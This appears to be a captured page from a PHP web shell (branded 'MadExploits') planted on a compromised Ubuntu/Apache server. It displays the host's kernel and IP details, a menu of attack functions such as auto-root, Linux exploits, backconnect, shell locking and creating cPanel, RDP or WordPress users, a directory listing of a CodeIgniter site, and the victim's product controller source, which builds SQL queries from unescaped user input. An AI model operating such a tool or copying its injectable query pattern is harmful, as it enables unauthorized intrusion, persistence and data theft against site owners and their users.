Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
application /
controllers /
[ HOME SHELL ]
Name
Size
Permission
Action
11-05-Publication.php
1.2
KB
-rwxr-x--x
260923-Events.php
1.62
KB
-rwxr-x--x
Ablog.php
17.92
KB
-rwxr-x--x
Artist.php
372
B
-rwxr-x--x
Blog.php
1.71
KB
-rwxr-x--x
Cat.php
19.11
KB
-rwxr-x--x
Contact.php
4.03
KB
-rwxr-x--x
Corse.php
20.35
KB
-rwxr-x--x
Courses.php
1.76
KB
-rwxr-x--x
Dashboard.php
491
B
-rwxr-x--x
Digital.php
373
B
-rwxr-x--x
Event.php
371
B
-rwxr-x--x
Events.php
1.62
KB
-rwxrwxrwx
Evnt.php
21.69
KB
-rwxr-x--x
Faculty.php
602
B
-rwxr-x--x
Fareas.php
1.16
KB
-rwxr-x--x
Home.php
717
B
-rwxr-x--x
Item.php
32.49
KB
-rwxr-x--x
Jobc.php
20.29
KB
-rwxr-x--x
Jobs.php
4.62
KB
-rwxr-x--x
Login.php
3.63
KB
-rwxr-x--x
Mdc.php
15.88
KB
-rwxr-x--x
Media.php
1.14
KB
-rwxr-x--x
Memories.php
481
B
-rwxr-x--x
Mems.php
16.03
KB
-rwxr-x--x
Pages.php
6.05
KB
-rwxr-x--x
Prod.php
5.01
KB
-rwxr-x--x
Profile.php
2.15
KB
-rwxr-x--x
Proj.php
22.41
KB
-rwxr-x--x
Projects.php
1.64
KB
-rwxr-x--x
Projt.php
10.86
KB
-rwxr-x--x
Puba.php
10.95
KB
-rwxr-x--x
Publ.php
22.94
KB
-rwxr-x--x
Publication.php
2.59
KB
-rwxr-x--x
Pubv.php
10.95
KB
-rwxr-x--x
Staff.php
600
B
-rwxr-x--x
Udig.php
10.37
KB
-rwxr-x--x
User.php
25.22
KB
-rwxr-x--x
Workshops.php
1.76
KB
-rwxr-x--x
Wrks.php
20.3
KB
-rwxr-x--x
index.html
131
B
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Prod.php
<?php defined('BASEPATH') OR exit('No direct script access allowed'); class Prod extends CI_Controller { public function __construct() { parent::__construct(); $this->data = $this->gblm->fConfig(); $this->data['SEO_TITL']=$this->lang->line('PRD_STL'); $this->data['SEO_DESC']=$this->lang->line('PRD_SDS'); $this->data['SEO_KEYS']=$this->lang->line('PRD_SKY'); $this->load->model('Prod_model','stm'); $this->load->library('form_validation'); } public function Index() { $data = $this->data; $data['PRSNT_LST'] = BLK_LIST; $data['rList'] = $this->stm->itmList("i.STATUS='".STATUS_A."'"); $this->load->view($this->data['DIR']['VIEW'],$data); } public function rdSrch() { $data = $this->data; $srchKey=Rsp($this->input->post('srchKey')); if($srchKey=='' || ($this->fm->cntCon($this->data['TBL']['ITM'],"NAME LIKE '%".$srchKey."%' AND STATUS='".STATUS_A."'" ) <=0)) { redirect($this->data['URL']['RDR_URL'],$data); } else { redirect($this->data['URL']['RDR_URL'].'/search/'.$srchKey,$data); } } public function List2nd($str=null) { $data = $this->data; if($str=='' || ($this->fm->cntCon($this->data['TBL']['ITM'],"NAME LIKE '%".$str."%' AND STATUS='".STATUS_A."'" ) <=0)) { redirect($this->data['URL']['RDR_URL'],$data); } $data['PRSNT_LST'] = BLK_LIST; $data['TSRCH_KEY'] = $str; $data['rList'] = $this->stm->itmList("i.NAME LIKE '%".$str."%' AND i.STATUS='".STATUS_A."'"); $this->load->view($this->data['DIR']['VIEW'],$data); } public function List1nd($str=null) { $data = $this->data; if($str=='' || ($this->fm->cntCon($this->data['TBL']['CAT'],"ALIAS='".$str."' AND STATUS='".STATUS_A."'" ) <=0)) { redirect($this->data['URL']['RDR_URL'],$data); } $data['PRSNT_LST'] = BLK_2LIST; $Dtls=$this->stm->catDtls("ALIAS='".$str."' AND STATUS='".STATUS_A."'"); $data['Dtls'] = $Dtls; $data['SEO_TITL'] = $Dtls['STITLE']; $data['SEO_DESC'] = $Dtls['SDESC']; $data['SEO_KEYS'] = $Dtls['SKEYS']; $data['rList'] = $this->stm->itmList("c.ID='".$Dtls['Id']."' AND i.STATUS='".STATUS_A."'"); $this->load->view($this->data['DIR']['VIEW'],$data); } public function Details($str1=null,$str2=null,$str3=null) { $data = $this->data; if($str1=='' || $str2=='' || $str3=='') { redirect($this->data['URL']['RDR_URL'],$data); } $Id=substr($str2,0,-3); if($Id=='' || (int)$Id<=0 || ($this->fm->cntCon($this->data['TBL']['ITM'],"ID='".$Id."' AND STATUS='".STATUS_A."'" ) <=0)) { redirect($this->data['URL']['RDR_URL'],$data); } $data['CURL'] = $str1; $data['PRDID'] = $str2; $data['ALIAS'] = $str3; $data['PRSNT_LST'] = BLK_DTLS; $data['SEO_TITL'] = dbOut($this->fm->fldValRand($this->data['TBL']['ITMS'],'STITLE',"ITMID='".$Id."'")); $data['SEO_DESC'] = dbOut($this->fm->fldValRand($this->data['TBL']['ITMS'],'SDESC',"ITMID='".$Id."'")); $data['SEO_KEYS'] = dbOut($this->fm->fldValRand($this->data['TBL']['ITMS'],'SKEYS',"ITMID='".$Id."'")); $data['Dtls']=$this->stm->prdDtls("ID='".$Id."' AND STATUS='".STATUS_A."'"); $this->load->view($this->data['DIR']['VIEW'],$data); } public function AddNew() { $data = $this->data; $this->form_validation->set_rules('Name','Full Name','trim|required'); $this->form_validation->set_rules('uEmail',$this->lang->line('GL_EMAIL_VALID_VAL'),'trim|required|valid_email'); $this->form_validation->set_rules('Subject','Subject','trim|required'); $this->form_validation->set_rules('msg','Message','trim|required'); if ($this->form_validation->run() == FALSE) { echo STATUS_ERROR; exit; } else { //SEND EMAIL $PRDID=substr(Rsp($this->input->post('prdSku')),0,-3); $ALIAS=Rsp($this->input->post('palias')); $CURL=Rsp($this->input->post('calias')); $PRDURL=$this->data['URL']['RDR_URL'].'/'.$CURL.'/'.Rsp($this->input->post('prdSku')).'/'.$ALIAS; $usrData['PRDNAME'] =Rsp($this->input->post('prdNme')); $usrData['PRDURL'] =$PRDURL; $usrData['NAME'] =CaseU($this->input->post('Name')); $usrData['EMAIL'] =CaseL($this->input->post('uEmail')); $usrData['SUBJECT'] =CaseL($this->input->post('Subject')); $usrData['MESSAGE'] =CaseL($this->input->post('msg')); $Usr_html =$this->load->view($this->data['DIR']['DR_HTML'].'/item-email',$usrData,TRUE); $Subject = "Spa Team Product related inquires"; $this->gblm->email_user(ADMIN_EMAIL,$Subject,$Usr_html,ucwords(CaseL($this->input->post('uEmail'))),CaseU($this->input->post('Name'))); $data = array( 'PRDID' =>$PRDID, 'NAME' =>CaseU(dbIn($this->input->post('Name'))), 'EMAIL' =>ucwords(CaseL(dbIn($this->input->post('uEmail')))), 'SUBJECT' =>ucwords(CaseL(dbIn($this->input->post('Subject')))), 'MESSAGE' =>ucwords(CaseL(dbIn($this->input->post('msg')))), 'ADATE'=>DB_IN_DT); $dbStatus=$this->fm->addNew($this->data['TBL']['ITMC'],$data); if($dbStatus == TRUE) { echo 'Thanks for your contact. We will get back to you shortly.'; exit; }else { echo STATUS_ERROR; exit; } redirect($this->data['URL']['RDR_URL'], $data); } } }
Close